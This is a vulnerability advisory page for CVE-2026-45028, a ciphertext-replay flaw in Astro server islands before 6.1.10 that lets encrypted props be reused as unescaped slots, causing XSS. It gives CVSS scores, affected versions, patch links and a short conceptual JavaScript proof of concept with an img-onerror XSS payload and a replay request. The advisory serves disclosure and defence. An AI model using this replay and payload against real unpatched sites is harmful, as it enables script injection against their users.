Security Vulnerability Report
CVE-2026-45028 CVSS 6.1 MEDIUM

CVE-2026-45028

Published: 2026-05-13 16:17:00
Last Modified: 2026-05-14 13:28:33

Description

Astro is a web framework. Astro versions prior to 6.1.10 used AES-GCM encryption to protect the confidentiality and integrity of server island props and slots parameters, but did not bind the ciphertext to its intended component or parameter type. An attacker could replay one component's encrypted props (p) value as another component's slots (s) value, or vice versa. Since slots contain raw unescaped HTML while props may contain user-controlled values, this could lead to XSS in applications. This occurs when the application uses server islands, two different server island components share the same key name for a prop and a slot, and an attacker has full control over the value of the overlapping prop (requires a dynamically rendered page). This vulnerability is fixed in 6.1.10.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector (v3.1, primary): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSS v4.0 (secondary): 2.9 LOW, CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weaknesses: CWE-323, CWE-79

Configurations (Affected Products)

cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:* - VULNERABLE
Astro < 6.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// Conceptual Proof of Concept for CVE-2026-45028
// Attacker scenario: Replaying an encrypted 'prop' as a 'slot' to trigger XSS.

// 1. Assume the attacker controls the 'data' prop in 'ComponentA'.
//    They inject a malicious payload:
var maliciousPayload = "<img src=x onerror=alert('XSS')>";

// 2. The server encrypts this payload for 'ComponentA' props (p).
//    Attacker intercepts the response (e.g., via Burp Suite or browser DevTools).
//    Example captured encrypted value (Base64):
var interceptedEncryptedValue = "AQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyA...";

// 3. Attacker sends a request to 'ComponentB', which has a slot (s)
//    with the same key name 'data'.
//    The attacker replays the intercepted value as the slot input.
fetch('/api/component-b-render', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    // Replaying the prop ciphertext as a slot ciphertext
    s: interceptedEncryptedValue
  })
}).then(response => response.text())
  .then(html => {
    // 4. If vulnerable, the server renders the HTML containing the unescaped script.
    console.log("Vulnerable if alert appears in rendered HTML:", html);
  });
```

References

Patch commit: https://github.com/withastro/astro/commit/3d82220a1549e699e34ed433f3846a919f4c02bd
Pull request (Issue Tracking, Patch): https://github.com/withastro/astro/pull/16457
Vendor advisory: https://github.com/withastro/astro/security/advisories/GHSA-xr5h-phrj-8vxv
